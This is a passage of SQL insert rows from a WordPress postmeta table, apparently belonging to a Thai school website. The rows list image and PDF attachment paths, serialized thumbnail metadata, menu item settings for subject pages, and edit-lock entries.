(6385, 2397, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:195;s:6:\"height\";i:242;s:4:\"file\";s:29:\"2018/05/8-5-2561-11-54-19.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"8-5-2561-11-54-19-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6386, 2398, '_wp_attached_file', '2018/05/8-5-2561-11-54-30.jpg'),
(6387, 2398, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:581;s:6:\"height\";i:151;s:4:\"file\";s:29:\"2018/05/8-5-2561-11-54-30.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"8-5-2561-11-54-30-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"8-5-2561-11-54-30-300x78.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:78;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"8-5-2561-11-54-30-400x104.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:104;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6388, 2399, '_wp_attached_file', '2018/05/8-5-2561-11-54-55.jpg'),
(6389, 2399, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:957;s:6:\"height\";i:632;s:4:\"file\";s:29:\"2018/05/8-5-2561-11-54-55.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"8-5-2561-11-54-55-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"8-5-2561-11-54-55-300x198.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"8-5-2561-11-54-55-768x507.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:507;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"8-5-2561-11-54-55-400x264.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:264;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6390, 2400, '_wp_attached_file', '2018/05/8-5-2561-11-55-23.jpg'),
(6391, 2400, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:956;s:6:\"height\";i:631;s:4:\"file\";s:29:\"2018/05/8-5-2561-11-55-23.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"8-5-2561-11-55-23-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"8-5-2561-11-55-23-300x198.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"8-5-2561-11-55-23-768x507.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:507;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"8-5-2561-11-55-23-400x264.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:264;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6392, 2396, '_hide_featured', NULL),
(6393, 2403, '_edit_lock', '1525770111:3'),
(6394, 2403, '_edit_last', '3'),
(6395, 2404, '_menu_item_type', 'custom'),
(6396, 2404, '_menu_item_menu_item_parent', '859'),
(6397, 2404, '_menu_item_object_id', '2404'),
(6398, 2404, '_menu_item_object', 'custom'),
(6399, 2404, '_menu_item_target', ''),
(6400, 2404, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(6401, 2404, '_menu_item_xfn', ''),
(6402, 2404, '_menu_item_url', '#'),
(6404, 2405, '_menu_item_type', 'custom'),
(6405, 2405, '_menu_item_menu_item_parent', '2404'),
(6406, 2405, '_menu_item_object_id', '2405'),
(6407, 2405, '_menu_item_object', 'custom'),
(6408, 2405, '_menu_item_target', ''),
(6409, 2405, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(6410, 2405, '_menu_item_xfn', ''),
(6411, 2405, '_menu_item_url', '/สังคมศึกษา'),
(6413, 2406, '_menu_item_type', 'custom'),
(6414, 2406, '_menu_item_menu_item_parent', '2404'),
(6415, 2406, '_menu_item_object_id', '2406'),
(6416, 2406, '_menu_item_object', 'custom'),
(6417, 2406, '_menu_item_target', ''),
(6418, 2406, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(6419, 2406, '_menu_item_xfn', ''),
(6420, 2406, '_menu_item_url', '/สุขศึกษาและพลศึกษา'),
(6422, 2407, '_menu_item_type', 'custom'),
(6423, 2407, '_menu_item_menu_item_parent', '2404'),
(6424, 2407, '_menu_item_object_id', '2407'),
(6425, 2407, '_menu_item_object', 'custom'),
(6426, 2407, '_menu_item_target', ''),
(6427, 2407, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(6428, 2407, '_menu_item_xfn', ''),
(6429, 2407, '_menu_item_url', '/ภาษาไทย'),
(6431, 2408, '_menu_item_type', 'custom'),
(6432, 2408, '_menu_item_menu_item_parent', '2404'),
(6433, 2408, '_menu_item_object_id', '2408'),
(6434, 2408, '_menu_item_object', 'custom'),
(6435, 2408, '_menu_item_target', ''),
(6436, 2408, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(6437, 2408, '_menu_item_xfn', ''),
(6438, 2408, '_menu_item_url', '/วิทยาศาสตร์'),
(6440, 2409, '_menu_item_type', 'custom'),
(6441, 2409, '_menu_item_menu_item_parent', '2404'),
(6442, 2409, '_menu_item_object_id', '2409'),
(6443, 2409, '_menu_item_object', 'custom'),
(6444, 2409, '_menu_item_target', ''),
(6445, 2409, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(6446, 2409, '_menu_item_xfn', ''),
(6447, 2409, '_menu_item_url', '/คณิตศาสตร์'),
(6449, 2410, '_menu_item_type', 'custom'),
(6450, 2410, '_menu_item_menu_item_parent', '2404'),
(6451, 2410, '_menu_item_object_id', '2410'),
(6452, 2410, '_menu_item_object', 'custom'),
(6453, 2410, '_menu_item_target', ''),
(6454, 2410, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(6455, 2410, '_menu_item_xfn', ''),
(6456, 2410, '_menu_item_url', '/ภาษาต่างประเทศ'),
(6458, 2418, '_edit_lock', '1550471654:3'),
(6459, 2418, '_edit_last', '3'),
(6460, 2418, '_hide_featured', NULL),
(6461, 2421, '_wp_attached_file', '2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2551.pdf'),
(6462, 2422, '_wp_attached_file', '2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2552.pdf'),
(6463, 2423, '_wp_attached_file', '2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2553.pdf'),
(6464, 2424, '_wp_attached_file', '2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2554.pdf'),
(6465, 2425, '_wp_attached_file', '2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2555.pdf'),
(6466, 2426, '_wp_attached_file', '2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2556.pdf'),
(6467, 2427, '_wp_attached_file', '2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2557.pdf'),
(6468, 2428, '_wp_attached_file', '2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2558.pdf'),
(6472, 2442, '_wp_attached_file', '2018/05/บันทึกข้อความขอดำเนินโครงการเปล่า.pdf'),
(6473, 2443, '_wp_attached_file', '2018/05/บันทึกข้อความขอดำเนินโครงการเปล่า.docx'),
(6474, 2445, '_menu_item_type', 'custom'),
(6475, 2445, '_menu_item_menu_item_parent', '1160'),
(6476, 2445, '_menu_item_object_id', '2445'),
(6477, 2445, '_menu_item_object', 'custom'),
(6478, 2445, '_menu_item_target', ''),
(6479, 2445, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(6480, 2445, '_menu_item_xfn', ''),
(6481, 2445, '_menu_item_url', '/องค์การนักวิชาชีพในอนา'),
(6483, 2446, '_edit_lock', '1530089382:3'),
(6484, 2446, '_edit_last', '3'),
(6485, 2447, '_wp_attached_file', '2018/05/ข้อมูลนักเรียน-นักศึกษา-2549.pdf'),
(6486, 2448, '_wp_attached_file', '2018/05/ข้อมูลนักเรียน-นักศึกษา-2550.pdf'),
(6487, 2449, '_wp_attached_file', '2018/05/ข้อมูลนักเรียน-นักศึกษา-2551.pdf'),
(6488, 2450, '_wp_attached_file', '2018/05/ข้อมูลนักเรียน-นักศึกษา-2552.pdf'),
(6489, 2451, '_wp_attached_file', '2018/05/ข้อมูลนักเรียน-นักศึกษา-2553.pdf'),
(6490, 2452, '_wp_attached_file', '2018/05/ข้อมูลนักเรียน-นักศึกษา-2554.pdf'),
(6491, 2453, '_wp_attached_file', '2018/05/ข้อมูลนักเรียน-นักศึกษา-2555.pdf'),
(6492, 2454, '_wp_attached_file', '2018/05/ข้อมูลนักเรียน-นักศึกษา-2556.pdf'),
(6493, 2455, '_wp_attached_file', '2018/05/ข้อมูลนักเรียน-นักศึกษา-2557.pdf'),
(6494, 2456, '_wp_attached_file', '2018/05/ข้อมูลนักเรียน-นักศึกษา-2558.pdf'),
(6495, 2457, '_wp_attached_file', '2018/05/ข้อมูลนักเรียน-นักศึกษา-2559.pdf'),
(6496, 2458, '_wp_attached_file', '2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf'),
(6497, 2446, '_hide_featured', NULL),
(6503, 2464, '_wp_attached_file', '2018/05/1-1.jpg'),
(6504, 2464, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:837;s:6:\"height\";i:593;s:4:\"file\";s:15:\"2018/05/1-1.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"1-1-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"1-1-768x544.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:544;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"1-1-400x283.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6507, 2466, '_wp_attached_file', '2018/05/3-1.jpg'),
(6508, 2466, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:839;s:6:\"height\";i:594;s:4:\"file\";s:15:\"2018/05/3-1.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"3-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"3-1-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"3-1-768x544.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:544;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"3-1-400x283.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6509, 2470, '_edit_lock', '1526055767:3'),
(6510, 2470, '_edit_last', '3'),
(6511, 2471, '_wp_attached_file', '2018/05/ประกาศผล-ครูอัตราจ้าง-ก่อสร้าง.pdf'),
(6512, 2472, '_wp_attached_file', '2018/05/ประกาศผล-จนท.วิทยบริการ.pdf'),
(6516, 2470, '_hide_featured', NULL),
(6517, 2470, '_wpas_done_all', '1'),
(6518, 2470, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575260553;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5046;}i:1;a:1:{s:2:\"id\";i:4139;}i:2;a:1:{s:2:\"id\";i:4269;}}}}'),
(6519, 2475, '_edit_lock', '1526055635:3'),
(6520, 2475, '_edit_last', '3'),
(6526, 2475, '_hide_featured', NULL),
(6527, 2475, '_wpas_done_all', '1'),
(6528, 2475, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575720521;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4139;}i:1;a:1:{s:2:\"id\";i:6008;}i:2;a:1:{s:2:\"id\";i:5906;}}}}'),
(6531, 2518, '_edit_lock', '1526466367:1'),
(6532, 2518, '_edit_last', '1'),
(6533, 2519, '_wp_attached_file', '2018/05/0001.jpg'),
(6534, 2519, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2481;s:6:\"height\";i:3509;s:4:\"file\";s:16:\"2018/05/0001.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"0001-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"0001-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"0001-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:17:\"0001-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:16:\"0001-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6538, 2518, '_hide_featured', NULL),
(6539, 2518, '_wpas_done_all', '1'),
(6540, 2518, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574244602;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5936;}i:1;a:1:{s:2:\"id\";i:6040;}i:2;a:1:{s:2:\"id\";i:5026;}}}}'),
(6541, 2533, '_wp_attached_file', '2018/05/2.jpg'),
(6542, 2533, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:837;s:6:\"height\";i:590;s:4:\"file\";s:13:\"2018/05/2.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"2-300x211.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:211;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"2-768x541.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:541;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"2-400x282.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:282;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6543, 2534, '_wp_attached_file', '2018/05/3.jpg'),
(6544, 2534, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:837;s:6:\"height\";i:571;s:4:\"file\";s:13:\"2018/05/3.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"3-300x205.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:205;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"3-768x524.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:524;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:13:\"3-400x273.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:273;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6545, 2535, '_wp_attached_file', '2018/05/17-5-2561-17-47-11.jpg'),
(6546, 2535, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:266;s:6:\"height\";i:53;s:4:\"file\";s:30:\"2018/05/17-5-2561-17-47-11.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"17-5-2561-17-47-11-150x53.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:53;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6547, 2536, '_wp_attached_file', '2018/05/biodiversity-21597-1.jpg'),
(6548, 2536, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:800;s:6:\"height\";i:600;s:4:\"file\";s:32:\"2018/05/biodiversity-21597-1.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"biodiversity-21597-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"biodiversity-21597-1-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"biodiversity-21597-1-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"biodiversity-21597-1-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6549, 2537, '_wp_attached_file', '2018/05/17-5-2561-17-54-14.jpg'),
(6550, 2537, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:181;s:6:\"height\";i:55;s:4:\"file\";s:30:\"2018/05/17-5-2561-17-54-14.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"17-5-2561-17-54-14-150x55.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:55;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6551, 2538, '_wp_attached_file', '2018/05/17-5-2561-17-56-09.jpg'),
(6552, 2538, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:204;s:6:\"height\";i:51;s:4:\"file\";s:30:\"2018/05/17-5-2561-17-56-09.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"17-5-2561-17-56-09-150x51.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:51;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6553, 2539, '_wp_attached_file', '2018/05/17-5-2561-17-58-52.jpg'),
(6554, 2539, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:136;s:6:\"height\";i:51;s:4:\"file\";s:30:\"2018/05/17-5-2561-17-58-52.jpg\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6559, 2542, '_wp_attached_file', '2018/05/17-5-2561-18-03-44.jpg'),
(6560, 2542, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:442;s:6:\"height\";i:323;s:4:\"file\";s:30:\"2018/05/17-5-2561-18-03-44.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"17-5-2561-18-03-44-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"17-5-2561-18-03-44-300x219.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:219;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"17-5-2561-18-03-44-400x292.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:292;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6561, 2543, '_wp_attached_file', '2018/05/17-5-2561-18-05-19.jpg'),
